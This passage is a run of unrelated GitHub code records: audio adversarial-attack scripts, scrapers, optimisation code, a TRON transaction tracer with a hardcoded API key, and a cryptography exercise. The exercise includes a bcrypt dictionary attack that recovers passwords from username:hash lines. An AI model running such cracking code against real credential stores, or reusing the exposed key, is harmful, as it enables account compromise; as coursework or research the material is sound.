yaml.load(f_yaml, Loader=yaml.FullLoader)\nmodel726 = RawNet726(parser1['model'], device)\nmodel726 = (model726).to(device)\nmodel726.load_state_dict(torch.load(model726_path, map_location=device))\nprint('Model loaded : {}'.format(model726_path))\n\n# model646_path = Config.RawNet646_model\n# yaml646_path = Gconfig.RAW646_YAML_CONFIG_PATH\n# with open(yaml646_path, 'r') as f_yaml:\n# parser1 = yaml.load(f_yaml, Loader=yaml.FullLoader)\n# model646 = RawNet646(parser1['model'], device)\n# model646 = (model646).to(device)\n# model646.load_state_dict(torch.load(model646_path, map_location=device))\n# print('Model loaded : {}'.format(model646_path))\n\n#AdvsetPath = Config.RawNet56_Subens_CWAdvsetPath\nAdvsetPath =r\"F:\\Adversarial-1D\\AavSave\\Raw56\\SA-1D\\56-726-4-sn0-v0-step50-decay0-ngw-False\"\nNpsave=r\"F:\\Adversarial-1D\\Paint_Adv2\\temp\"\na = paint_PGD_ens3(\n attackdir=datasetPath,savedir=AdvsetPath,grad_save_path=Npsave,\n model=model56,model_few=model4,model_more=model726,\n input_shape=(1, 1,56000),input_shape_more=(1,1,72600),\n input_shape_few=(1,1,40000),\n eps=0.05,alpha=0.001,steps=50)\n\na.attack()\ndel(a)\n","repo_name":"QRICKDD/SA","sub_path":"RawNet56/paint_prove_grad3.py","file_name":"paint_prove_grad3.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34025419179","text":"import logging\nfrom docutils import nodes\nfrom docutils.transforms import Transform\nfrom docutils.transforms.references import Substitutions\nfrom docutils.readers.standalone import Reader\n\nclass LogDocutilsMessages(Transform):\n \"\"\"\n Log system messages from docutils by applying a post-Transform after reading an rst block \n \"\"\"\n default_priority = 870\n\n def apply(self):\n # find all nodes, so we can try and actually log the markup that caused the problem \n for node in tuple(self.document.findall(nodes.problematic)): \n #locate the node that corresponds to the problem\n for m in self.document.parse_messages:\n if node.get('refid') in m.get('ids'): \n #strip all the docutils gumph, just get the message\n system_message = m.children[0].astext() + '\\n'\n #try and grab some surroundng context \n try: \n context_before = node.previous_sibling().pformat()\n except (AttributeError, IndexError): \n context_before = ''\n \n try: \n context_after = node.parent[\n node.parent.index(node) + 1\n ].pformat()\n except IndexError: \n context_after = ''\n \n logging.warning('reStructuredText sadness: ' \n + system_message \n + context_before \n + node.pformat() \n + context_after) \n \n \n\nclass LoggingDocutilsReader(Reader): \n '''\n Exists only to attach our logging transform to the reading process \n '''\n def get_transforms(self): \n return Reader.get_transforms(self) + [Substitutions] + [LogDocutilsMessages] \n","repo_name":"flucoma/flucoma-docs","sub_path":"flucoma/doc/rst/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"41848996196","text":"import random\nfrom turtle import *\nimport time\n\nCOLOR = (0.2039215686, 0.3409803922, 0.5921568627)\nTARGET = (0, 0.7, 0.99218)\n\nscreen = Screen()\nscreen.tracer(False)\n\nWIDTH, HEIGHT = 700, 500\n\ndeltas = [(hue - COLOR[index]) / HEIGHT for index, hue in enumerate(TARGET)]\n\nturtle = Turtle()\nturtle.color(COLOR)\n\nturtle.penup()\nturtle.goto(-WIDTH/2, HEIGHT/2)\nturtle.pendown()\n\ndirection = 1\n\nfor distance, y in enumerate(range(HEIGHT//2, -HEIGHT//2, -1)):\n\n turtle.forward(WIDTH * direction)\n turtle.color([COLOR[i] + delta * distance for i, delta in enumerate(deltas)])\n turtle.sety(y)\n\n direction *= -1\n\nscreen.tracer(True)\n\n\npenup()\ncolor(\"white\", \"white\")\nsetup(width=700, height=500, startx=None, starty=None)\npenup()\n\npenup()\ngoto(-330,225)\npendown()\nbegin_fill()\nsignal = input(str(\"(max 5)(as int)what signal strenth = \"))\ncircle(10, extent=None, steps=None)\npenup()\nif signal == \"1\":\n end_fill()\nforward(25)\npendown()\ncircle(10, extent=None, steps=None)\npenup()\nif signal == \"2\":\n end_fill()\nforward(25)\npendown()\ncircle(10, extent=None, steps=None)\npenup()\nif signal == \"3\":\n end_fill()\nforward(25)\npendown()\ncircle(10, extent=None, steps=None)\npenup()\nif signal == \"4\":\n end_fill()\nforward(25)\npendown()\ncircle(10, extent=None, steps=None)\npenup()\nend_fill()\n \n\nforward(25)\nright(90)\nforward(2)\nleft(90)\npendown()\nmobileCarr = input(\"what is your moblie carrier = \").upper()\nwrite(mobileCarr, font=(\"Arial\", 13 ,\"normal\"))\n\npenup()\ngoto(230, 225)\npendown()\nbatper = input(\"battery percentage = \")\nwrite(batper + \"%\", font=(\"Arial\", 13 ,\"normal\"))\npenup()\ngoto(275, 228)\n#drawing battery outline\npendown()\nforward(35)\nleft(90)\nforward(5)\nright(90)\nforward(2)\nleft(90)\nforward(5)\nleft(90)\nforward(2)\nright(90)\nforward(5)\nleft(90)\nforward(35)\nleft(90)\nforward(15)\n#drawing percentage\nbatPerIn = (int(batper)/35)* 12.25\nbegin_fill()\nleft(90)\nforward(int(batPerIn))\nleft(90)\nforward(15)\nleft(90)\nforward(int(batPerIn))\nleft(90)\nforward(15)\nend_fill()\npenup()\n \ngoto(-330, 190)\n\ncolor(\"lightblue\", \"lightblue\")\nbegin_fill()\nleft(135)\npendown()\nforward(25)\nright(90)\nforward(5)\nright(90)\nforward(20)\nleft(90)\nforward(20)\nright(90)\nforward(5)\nright(90)\nforward(25)\nend_fill()\npenup()\n\ngoto(-300, 172)\nwrite(\"Heart Rate\", font=(\"Arial\", 20 ,\"normal\"))\ncolor(\"white\", \"white\")\n\ngoto(-65, 170)\nday = input(\"what is the day of the week = \")\nwrite(day, font=(\"Arial\", 20 ,\"normal\"))\n\ngoto(-110, 119)\ncolor(\"pink\", \"pink\")\nwrite(\"♥\", font=(\"Arial\", 20 ,\"normal\"))\ngoto(-85, 122)\ncolor(\"white\", \"white\")\nwrite(\"Beats Per Minute\", font=(\"Arial\", 15 ,\"normal\"))\n\ngoto(-330, 50)\nwrite(\"175\", font=(\"Arial\", 13 ,\"normal\"))\nright(45)\nforward(10)\nright(90)\nforward(40)\npendown()\nforward(610)\npenup()\n\ngoto(-330, -75)\nwrite(\"125\", font=(\"Arial\", 13 ,\"normal\"))\nleft(90)\nforward(10)\nright(90)\nforward(40)\npendown()\nforward(610)\npenup()\n\ngoto(-330, -200)\nwrite(\"50\", font=(\"Arial\", 13 ,\"normal\"))\nleft(90)\nforward(10)\nright(90)\nforward(40)\npendown()\nforward(610)\npenup()\n\ngoto(-250, -230)\nworkoutStartHour = input(\"What hour did you start your workout? = \")\nworkoutStartMin = input(\"How many minutes of the hour did you start your workout? = \")\nwrite(workoutStartHour+\":\"+workoutStartMin, font=(\"Arial\", 13 ,\"normal\"))\n\ngoto(250, -230)\nworkoutEndHour = input(\"What hour did you end your workout? = \")\nworkoutEndMin = input(\"How many minutes of the hour did you end your workout? = \")\nwrite(workoutEndHour+\":\"+workoutEndMin, font=(\"Arial\", 13 ,\"normal\"))\n\n#making line\nyPoints = [-160, -155, -140, -155, -130, -110, -120, -80, -100, -50, -60, -20, 0, 10, -20, 15, 5, 20, 0, 30, 10, 40, 20, 26, 10, 45, -30, -25,-10, -32, 10, 0, 20, 15, 30, 25, 40, 45, 30, 40, 20, 45, 15, 20, 10, 25, 20, 35, 30 ,45, 40 ,30, 35, 20, -30, -50, -40, -10, 10, 20, 5, 20, 15, 30 ,45, 35, 50, 40 ,49, 55, 40, 50, 45, 30, 40, 20, 25, 25, 10, 0, 7, 10, 15, 10, 15, 10, 5, 0 , -10, 5, -15 - 30, -20, -40, -50, -40, -100, -130, -120, -150, -140, -160, -150, -160, -140, -160, -150, -160, -140, -160]\n\ncolor(\"red\", \"black\")\npenup()\npensize(6)\ncurX = -250\ncurY = 250\nxStep = 5\ngoto(-250, -160)\nprint(\"plotting...\") \n\noption = input(\"do you want to use presets or plot your own (enter preset or own) = \").lower()\n\nif option == \"preset\":\n for i in yPoints: \n pendown()\n curY = i\n randNum = random.randint(-5, 10)\n randY = i + randNum\n print(curX, \",\", randY)\n goto(curX, randY)\n curX = curX + xStep\n time.sleep(0.25)#comment out to make plotting faster or change \nelse:\n x = 0\n while x < len(yPoints):\n pendown()\n Y = input(\"enter next y point(50=170bpm/-160=70bpm) or undo = \")\n if Y == \"undo\":\n undo()\n else:\n print(curX, \",\", Y)\n goto(curX, int(Y))\n curX = curX + xStep\n time.sleep(0.25)#comment out to make plotting faster or change\n x = x + 1\npenup()\ngoto(-1000, 1000)\n\ndone()\n","repo_name":"Dom-HTML/Fitbit-Fake","sub_path":"Fitbit-Fake.py","file_name":"Fitbit-Fake.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"73659219744","text":"from abc import ABC\nfrom typing import List\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver import Chrome, ChromeOptions\nfrom selenium.webdriver.support.expected_conditions import (\n visibility_of_all_elements_located, visibility_of_element_located)\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.remote.webelement import WebElement\n\nclass SeleniumScraperBase(ABC):\n '''\n 動的なサイトをスクレイピングする場合は、このクラスを継承。\n '''\n\n def __init__(self, executable_path: str, visible : bool = False, wait_time: float = 10):\n \"\"\"\n Parameters\n ----------\n executable_path : str\n chrome driverまでのパス\n visible : bool, default False\n ブラウザを起動して動作させるかのフラグ\n wait_time : float, default 10\n タイムアウトまでの時間\n \"\"\"\n self.option = ChromeOptions()\n if not visible:\n self.option.add_argument('--headless')\n self.option.add_experimental_option(\n 'excludeSwitches', ['enable-logging'])\n self.option.use_chromium = True\n self.driver = Chrome(\n executable_path=executable_path, options=self.option)\n self.driver.implicitly_wait(wait_time)\n self.wait = WebDriverWait(self.driver, wait_time)\n\n def __del__(self):\n self.driver.close()\n\n def _visit_page(self, url) -> None:\n self.driver.get(url)\n\n def _get_element(self, by, text) -> WebElement:\n return self.wait.until(visibility_of_element_located((by, text)))\n\n def _get_elements(self, by, text) -> List[WebElement]:\n return self.wait.until(visibility_of_all_elements_located((by, text)))\n\n def _click(self, element) -> None:\n self.driver.execute_script(\"arguments[0].scrollIntoView(false);\", element)\n element.click()\n\n def _select(self, element, idx) -> None:\n select = Select(element)\n select.select_by_index(idx)\n\n\nclass SoupScraperBase(ABC):\n '''\n 静的なサイトをスクレイピングする場合は、このクラスを継承。\n '''\n def __init__(self, login_url: str = None, login_info: dict = None):\n \"\"\"\n Parameters\n ----------\n login_url : str, optional\n _description_, by default None\n login_info : dict, optional\n _description_, by default None\n \"\"\"\n self.login = False\n if (login_info is not None) and (login_url is not None):\n self.login = True\n self.session = requests.session()\n self.session.post(login_url, data=login_info)\n\n def _get_soup(self, url: str, encoding: str = None):\n if self.login:\n html = self.session.get(url)\n else:\n html = requests.get(url)\n if encoding is not None:\n html.encoding = encoding\n content = html.content if self.login else html.text\n soup = BeautifulSoup(content, \"html.parser\")\n return soup\n\n def _get_element(self, soup: BeautifulSoup, tag: str, by: str = None, text: str = None) -> BeautifulSoup:\n attrs = {by: text} if by is not None else {}\n return soup.find(tag, attrs=attrs)\n\n def _get_elements(self, soup: BeautifulSoup, tag: str, by: str = None, text: str = None) -> List[BeautifulSoup]:\n attrs = {by: text} if by is not None else {}\n return soup.find_all(tag, attrs=attrs)\n","repo_name":"apiss2/scraping","sub_path":"scraping/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"17147005961","text":"# build-in\n# from pathlib import Path\n\n# third-party\nimport torch\nfrom torch.utils.data import Dataset\n\n\nclass GeoImageDataset(Dataset):\n def __init__(\n self, img_files: list, mask_files: list\n ): # img_dir: Path, mask_dir: Path, transform=None\n self.img_files = img_files\n self.mask_files = mask_files\n\n # self.img_dir = img_dir\n # self.mask_dir = mask_dir\n # self.img_files = os.listdir(self.img_dir)\n # self.mask_files = os.listdir(self.mask_dir)\n # self.transform = transform\n\n def __len__(self) -> int:\n return len(self.img_files)\n\n def __getitem__(self, idx: int) -> tuple:\n # Load image\n img_path = self.img_files[idx]\n # mask and img_file have so far the same name\n mask_path = self.mask_files[idx]\n img = torch.load(img_path)\n # converts bool mask into integer (0/1)\n mask = torch.load(mask_path).long()\n # Apply transform (if any)\n # if self.transform:\n # img = self.transform(img)\n return img, mask\n\n # def __getitem__(self, idx: int) -> tuple:\n # # Load image\n # img_path = os.path.join(self.img_dir, self.img_files[idx])\n # # mask and img_file have so far the same name\n # mask_path = os.path.join(self.mask_dir, self.img_files[idx])\n # img = torch.load(img_path)\n # # converts bool mask into integer (0/1)\n # mask = torch.load(mask_path).long()\n # # Apply transform (if any)\n # # if self.transform:\n # # img = self.transform(img)\n\n # return img, mask\n","repo_name":"Taraman12/Solarpark-detection","sub_path":"src/ML_Modell/dataset_class.py","file_name":"dataset_class.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"6750858199","text":"import requests\n\ndef trace_destination(source_address, api_key):\n current_address = source_address\n while True:\n transaction = find_transaction_by_input(current_address, api_key)\n if transaction is None:\n return current_address\n current_address = transaction['raw_data']['contract'][0]['parameter']['value']['to_address']\n\ndef find_transaction_by_input(input_address, api_key):\n url = f'https://api.trongrid.io/v1/accounts/{input_address}/transactions'\n headers = {'TRON-PRO-API-KEY': api_key}\n while url is not None:\n response = requests.get(url, headers=headers)\n data = response.json()\n transactions = data['data']\n retry = 3\n for transaction in transactions:\n if transaction['raw_data']['contract'][0]['parameter']['value']['owner_address'] == input_address:\n return transaction\n url = data['meta']['links'].get('next')\n return None\n\n\nprint(find_transaction_by_input(input_address=\"TWg9uE1CLRF8BVh94tQUsxbkeiLsgrg7rm\", api_key=\"8b0988e0-5691-42ef-9d56-945c33832a78\"))\n","repo_name":"Jain-Ayush-11/Kavach-2023","sub_path":"hops.py","file_name":"hops.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1420405309","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport inputProcessing\r\nimport ScenarioGeneratio\r\nfrom gurobipy import Model, Var, GRB, quicksum\r\nimport pdb\r\n#import ScenarioGeneratio \r\n\r\n\r\n\r\n\r\n\r\ndef solvePerfectInformation(gp, I, K, W, l_init, q_init, c_init):\r\n GenAvg=0.0\r\n UpAvg=0.0\r\n SpAvg=0.0\r\n RefAvg=0.0\r\n FlrAvg=0.0\r\n L_min= 50\r\n L_max=1200\r\n ub=np.zeros(K)\r\n M=1000000 \r\n T_R_down=2\r\n T_F_down=4\r\n# loop over all sample paths\r\n for k in range(K):\r\n# Model\r\n perfectInfo = Model(\"GenAndUpg\")\r\n\r\n Gen=[]\r\n for x_G in range(I):\r\n Gen.append(perfectInfo.addVar(lb=0 , vtype=GRB.CONTINUOUS, \r\n obj=-W[x_G, k, 0]*gp[5]*np.power(gp[6], x_G),\r\n name=\"Gen[%d]\" %x_G))\r\n \r\n Up=[] \r\n for x_U in range(I):\r\n Up.append(perfectInfo.addVar(lb=0, vtype=GRB.CONTINUOUS, \r\n obj=gp[7]*np.power(gp[6], x_U),\r\n name=\"Up[%d]\" %x_U))\r\n \r\n Sp=[] \r\n for x_S in range(I):\r\n Sp.append(perfectInfo.addVar(lb=0, vtype=GRB.CONTINUOUS, \r\n obj=0,\r\n name=\"Sp[%d]\" %x_S)) \r\n\r\n Ref=[] \r\n for x_R in range(I):\r\n Ref.append(perfectInfo.addVar(lb=0, vtype=GRB.BINARY, \r\n obj=gp[8]*np.power(gp[6],x_R),\r\n name=\"Ref[%d]\" %x_R)) \r\n \r\n Gen_b=[]\r\n for xi_G in range(I):\r\n Gen_b.append(perfectInfo.addVar(lb=0, vtype=GRB.BINARY, \r\n obj=0,\r\n name=\"Gen_b[%d]\" %xi_G)) \r\n\r\n Flr=[]\r\n for xi_F in range(I):\r\n Flr.append(perfectInfo.addVar(lb=0, vtype=GRB.BINARY, \r\n obj=(100)* np.power(gp[6], xi_F),\r\n name=\"Flr[%d]\" %xi_F)) \r\n\r\n Cap=[]\r\n for q in range(I):\r\n Cap.append(perfectInfo.addVar(lb=0 , vtype=GRB.CONTINUOUS, \r\n obj=0,\r\n name=\"Cap[%d]\" %q)) \r\n \r\n Res=[]\r\n for l in range(I):\r\n Res.append(perfectInfo.addVar(lb= L_min, ub=L_max, vtype=GRB.CONTINUOUS, \r\n obj=0,\r\n name=\"Res[%d]\" %l)) \r\n \r\n Con=[]\r\n for c in range(I):\r\n Con.append(perfectInfo.addVar(lb=0 , ub=1, vtype=GRB.CONTINUOUS, \r\n obj=0,\r\n name=\"Con[%d]\" %c)) \r\n #########################################################################\r\n #robust part\r\n \r\n \r\n \r\n perfectInfo.modelSense = GRB.MINIMIZE\r\n \r\n \r\n perfectInfo.addConstr(\r\n (Res[0]- l_init == 0), \"initial reservior\")\r\n \r\n \r\n perfectInfo.addConstr(\r\n (Cap[0]- q_init == 0), \"initial capacity\")\r\n \r\n \r\n perfectInfo.addConstr(\r\n (Con[0]- c_init == 0), \"initial condition\") \r\n \r\n for i in range(I): \r\n perfectInfo.addConstr(\r\n (Gen[i]- Cap[i] <= 0), \"Generation\")\r\n\r\n\r\n for i in range(I): \r\n perfectInfo.addConstr(\r\n (Gen[i]- Res[i] <= 0)) \r\n\r\n for i in range(I): \r\n perfectInfo.addConstr(\r\n (Up[i]- gp[4] * Ref[i] <= 0)) \r\n \r\n\r\n for i in range(I): \r\n perfectInfo.addConstr(\r\n ( Gen_b[i] + Ref[i] <= 1)) \r\n \r\n for i in range(I): \r\n perfectInfo.addConstr(\r\n ( Gen[i] - M* Gen_b[i] <= 0)) \r\n\r\n for i in range(I): \r\n perfectInfo.addConstr(\r\n (Ref[i]- Flr[i] <= 0)) \r\n\r\n for i in range(I): \r\n perfectInfo.addConstr(\r\n (quicksum(Gen[i+j] for j in range(min(T_R_down, I-i )))- M* (1-Ref[i]) <=0))\r\n \r\n for i in range(I): \r\n perfectInfo.addConstr(\r\n (quicksum(Gen[i+j] for j in range(min(T_F_down, I-i )))- M* (1-Flr[i]) <=0))\r\n \r\n for i in range(I-1):\r\n perfectInfo.addConstr(\r\n (Res[i+1]- Res[i]+ Gen[i] - W[i , k, 1] + Sp [i]==0 ))\r\n \r\n for i in range(I-1):\r\n perfectInfo.addConstr(\r\n (Cap[i+1]- Cap[i] - Up[i] ==0 ))\r\n \r\n for i in range(I-1):\r\n perfectInfo.addConstr(\r\n (Con[i+1]- Con[i] - W[i, k, 2]* Gen_b[i] -(0- Con[i])* Ref[i] ==0 ))\r\n \r\n perfectInfo.write('GenAndUpg.lp') \r\n \r\n \r\n perfectInfo.optimize() \r\n print('Up[0]: {}, Sp[0]:{}, Ref[0]:{}, Flr[0]:{} \\n'. format(\r\n Up[0].x, Sp[0].x, Ref[0].x, Flr[0].x ))\r\n print('Power: {}, Inflow: {}, Detereoration: {}\\n'. format(\r\n W[i, 0, 0], W[i, 0, 1], W[i, 0, 2] )) \r\n \r\n print('Sample path: {:.4f}'.format(\r\n k ))\r\n if perfectInfo.status == GRB.Status.OPTIMAL:\r\n print('Optimal objective: %g' % perfectInfo.objVal)\r\n ub[k]= -perfectInfo.objVal\r\n# else:\r\n# ub[k]= M\r\n elif perfectInfo.status == GRB.Status.INF_OR_UNBD:\r\n print('Model is infeasible or unbounded')\r\n exit(0)\r\n elif perfectInfo.status == GRB.Status.INFEASIBLE:\r\n print('Model is infeasible')\r\n exit(0)\r\n elif perfectInfo.status == GRB.Status.UNBOUNDED:\r\n print('Model is unbounded')\r\n exit(0)\r\n else: \r\n print('Optimization ended with status %d' % perfectInfo.status)\r\n \r\n #refering to decisions at current period\r\n # pdb.set_trace() \r\n GenAvg+= Gen[0].x\r\n print('Optimal generation: {:.4f}'. format( Gen[0].x))\r\n UpAvg+= Up[0].x\r\n SpAvg+= Sp[0].x\r\n RefAvg+= Ref[0].x \r\n FlrAvg+= Flr[0].x\r\n \r\n # average of actions in the sample paths \r\n GenAvg=GenAvg/K\r\n UpAvg=UpAvg/K\r\n SpAvg=SpAvg/K\r\n RefAvg= RefAvg/K\r\n FlrAvg=FlrAvg/K\r\n \r\n if RefAvg> 0.5:\r\n RefAvg=1\r\n UpAvg= UpAvg\r\n GenAvg= 0\r\n else:\r\n RefAvg=0\r\n UpAvg=0\r\n\r\n \r\n XAvg=[GenAvg, UpAvg, SpAvg, RefAvg, FlrAvg]\r\n \r\n return ub, XAvg \r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n","repo_name":"DanialTaheri/DualReoptimization-with-TerminalValue","sub_path":"PerfectInformation.py","file_name":"PerfectInformation.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31618208025","text":"import argparse\nimport requests\nfrom lxml import html\nimport time\nfrom price_parser import Price\nimport multiprocessing\n#from multiprocessing import Pool\n\n# automatically reads in the next unread line so no need for a line number parameter\ndef line_from_csv(f):\n ln = f.readline()\n if ln == \"\":\n return None\n print( \"line: \", ln, end = \"\" )\n i = 0\n li = 0\n parsed_line = []\n while True:\n start = i\n while( i < len(ln) and ln[i] != ',' ):\n i = i + 1\n if i < len(ln):\n parsed_line.insert( li, ln[start:i] )\n li = li + 1\n i = i + 1\n if i >= len(ln):\n break\n return parsed_line\n\ndef process_file(file_path):\n file_name = file_path\n fi = open(file_name, \"r\") # r stands for read\n if fi == None:\n print(\"Could not open csv file: \", file_name)\n return None\n \n file_name_result = \"result_after_scraping.csv\"\n fo = open(file_name_result, \"w+\") # r stands for write over\n if fo == None:\n print(\"Could not create csv file: \", file_name_result)\n return None\n\n # copy over the header\n ln = fi.readline()\n fo.write(ln)\n\n while True:\n parsed_line = line_from_csv(fi)\n if parsed_line == None: # reached the last line of the csv\n break\n if len(parsed_line) < 1:\n fo.write(\"\\r\\n\")\n continue\n brand = parsed_line[0]\n url = parsed_line[1]\n annual_sales = get_annual_sales(url)\n parsed_line[3] = annual_sales\n alexa_rating = get_alexa_rating(url)\n parsed_line[4] = alexa_rating\n num_employees = get_num_employees(brand)\n parsed_line[5] = num_employees\n\n if parsed_line[6] == '': # don't overwrite a size that is already present in the csv\n if annual_sales != 'URL Failed':\n annual_sales = float(annual_sales)\n if annual_sales <= 10000000: # small <= 10m\n parsed_line[6] = 'Small'\n if annual_sales >= 100000000: # large >= 100m\n parsed_line[6] = 'Large'\n else: # medium is between small and large\n parsed_line[6] = 'Medium'\n elif num_employees != 'Brand Failed':\n num_employees = float(num_employees)\n if num_employees <= 10: # small <= 10\n parsed_line[6] = 'Small'\n if num_employees >= 100: # large >= 100\n parsed_line[6] = 'Large'\n else: # medium is between small and large\n parsed_line[6] = 'Medium'\n else:\n parsed_line[6] = '?Small' # set to ?Small if unable to parse info on the brand\n\n if parsed_line:\n line = \"\"\n for l in parsed_line:\n line = line + l + \",\"\n line = line[0:len(line)-1]\n fo.write(line)\n fo.write(\"\\r\\n\")\n else:\n print(\"No data scraped\")\n fi.close()\n fo.close()\n\ndef save_scraped_data(lines):\n if lines:\n file_name = \"result_after_scraping.csv\"\n f = open(file_name,\"w+\")\n f.write(\"Brand name\", \"Brand URL\", \"Shopify or other\",\"Annual sales\", \"Alexa rating\", \"# of employees,Segment (s/m/l/d)\", \"Name/Founder 1,Contact email\"\"\\r\\n\")\n for line in lines:\n f.write(line + \"\\r\\n\")\n f.close() \n else:\n print(\"No data scraped\")\n return\n\n# main code entry point\nif __name__==\"__main__\":\n multiprocessing.freeze_support()\n argparser = argparse.ArgumentParser()\n argparser.add_argument('path',help = 'Path to CSV')\n argparser.add_argument('start',help = 'Starting line in CSV') # includes starting line\n argparser.add_argument('end',help = 'Ending line in CSV') # includes ending line\n args = argparser.parse_args()\n file_path = args.path\n start = args.start\n end = args.end\n print(\">> \", file_path)\n process_file(file_path)\n # done\n\n# helper methods below - annual sales, alexa rating, number of employees\ndef get_annual_sales(url): \n url = 'https://ecommercedb.com/en/store/{0}'.format(url)\n headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'}\n failed = False\n\n # Retries 5 times for handling network errors\n for _ in range(2):\n print (\"Retrieving %s\"%(url)) \n response = requests.get(url, headers=headers, verify=True)\n parser = html.fromstring(response.text)\n print(\"Done retrieving - status code: \", response.status_code)\n\n if response.status_code!=200:\n failed = True\n continue\n else:\n failed = False\n break\n\n if failed:\n print(\"The ecommercedb.com network is unresponsive or url error. Please try again later (or now).\")\n return \"URL Failed\"\n\n raw_value = parser.xpath('//div[contains(@class, \"fancyBox__content\")]//text()')\n value = raw_value[0].strip()\n if value[len(value) - 1] == 'm':\n magnitude = 1000000\n else:\n magnitude = 1\n number_value = value[3: len(value) - 1]\n price = Price.fromstring(number_value).amount_float\n price = price * magnitude\n price = str(price)\n return price\n\ndef get_alexa_rating(url): \n url = 'https://www.alexa.com/siteinfo/{0}'.format(url)\n headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'}\n failed = False\n\n # Retries 5 times for handling network errors\n for _ in range(2):\n print (\"Retrieving %s\"%(url)) \n response = requests.get(url, headers=headers, verify=True)\n parser = html.fromstring(response.text)\n print(\"Done retrieving - status code: \", response.status_code)\n\n if response.status_code!=200:\n failed = True\n continue\n else:\n failed = False\n break\n\n if failed:\n print(\"The alexa.com network is unresponsive or url error. Please try again later (or now).\")\n return \"URL Failed\"\n\n raw_value = parser.xpath('//div[contains(@class, \"rankmini-rank\")]//text()') # some sites use rankmini-rank\n if len(raw_value) < 1:\n raw_value = parser.xpath('//p[contains(@class, \"big data\")]//text()') # some sites use big data\n if len(raw_value) < 1:\n return \"URL Failed\"\n value = raw_value[2].strip()\n ranking = ''.join([c for c in value if c in '1234567890'])\n return str(ranking)\n\ndef get_num_employees(brand): \n url = 'https://www.google.com/search?q={0} number of employees'.format(brand)\n headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'}\n failed = False\n\n # Retries 5 times for handling network errors\n for _ in range(2):\n print (\"Retrieving %s\"%(url)) \n response = requests.get(url, headers=headers, verify=True)\n parser = html.fromstring(response.text)\n print(\"Done retrieving - status code: \", response.status_code)\n\n if response.status_code!=200:\n failed = True\n continue\n else:\n failed = False\n break\n\n if failed:\n print(\"The google.com network is unresponsive or url error. Please try again later (or now).\")\n return \"Brand Failed\"\n\n raw_value = parser.xpath('//div[contains(@class, \"Z0LcW XcVN5d AZCkJd\")]//text()')\n if len(raw_value) < 1:\n return \"Brand Failed\"\n value = raw_value[0].strip()\n num_employees = ''.join([c for c in value if c in '1234567890'])\n return str(num_employees)","repo_name":"jenaalsup/scrape_brand_stats","sub_path":"slow_size_scraper.py","file_name":"slow_size_scraper.py","file_ext":"py","file_size_in_byte":7150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"16367831315","text":"from Crypto.Hash import SHA256\nimport random, string\nimport datetime\nfrom bcrypt import *\nfrom nltk.corpus import words\n\ndef hashArbitraryInput(input):\n bytesInput = str.encode(input) # converts string input into bytes\n h = SHA256.new()\n h.update(bytesInput)\n return h.hexdigest()\n\ndef modifyDigest(digestValue, modVal, length):\n modVal = int(modVal, 16)\n finalBits = \"\"\n for val in digestValue:\n fourBitValue = '{:04b}'.format(int(val, 16))\n finalBits += fourBitValue\n finalBits = int(finalBits, 2)\n binaryAfterMod = bin(finalBits % modVal).replace(\"0b\",\"\").zfill(length)\n return binaryAfterMod\n\ndef generateMessage():\n res = ''.join(random.choices(string.ascii_letters, k = 16))\n return res\n\ndef findCollision(modVal, length):\n myDict = {}\n while(True):\n someInput = generateMessage()\n truncatedDigest = modifyDigest(hashArbitraryInput(someInput), modVal, length)\n if truncatedDigest in myDict:\n return myDict[truncatedDigest], truncatedDigest, someInput, len(myDict.keys())\n else:\n myDict[truncatedDigest] = someInput\n continue\n\ndef readFile(fileName):\n f = open(fileName, \"r\")\n content = f.read()\n listOfUsers = content.splitlines()\n f.close()\n return listOfUsers \n\ndef gatherInfo(userInfo):\n info = userInfo.split(\":\")\n username = info[0]\n saltHash = info[1]\n salt = \"\"\n for i in range(len(saltHash)):\n if i == 29:\n break;\n else:\n salt += saltHash[i]\n return username, salt, saltHash\n\ndef findPassword(salt, saltHash, listOfWords):\n bSalt = salt.encode()\n for word in listOfWords:\n bWord = word.encode()\n myOutput = hashpw(bWord, bSalt)\n testVal = myOutput.decode()\n if testVal == saltHash:\n return word\n else:\n continue\n print(\"No password found!\")\n\n\n\ndef main():\n print(hashArbitraryInput(\"hello\"))\n print(hashArbitraryInput(\"iello\")) # iello has hamming distance of 1 bit with hello\n\n # print(hashArbitraryInput(\"a\"))\n # print(hashArbitraryInput(\"b\")) # a has hamming distance of 1 bit with b\n\n # print(hashArbitraryInput(\"BOB\"))\n # print(hashArbitraryInput(\"BOA\")) # BOB has hamming distance of 1 bit with BOA\n\n # hexString = 'ff'\n # addedVal = '3'\n # for i in range(8, 52, 2):\n # if i % 4 != 0:\n # hexString = addedVal + hexString\n # if i % 4 == 0 and i != 8:\n # hexString = hexString.replace(\"3\", \"f\", 1)\n # 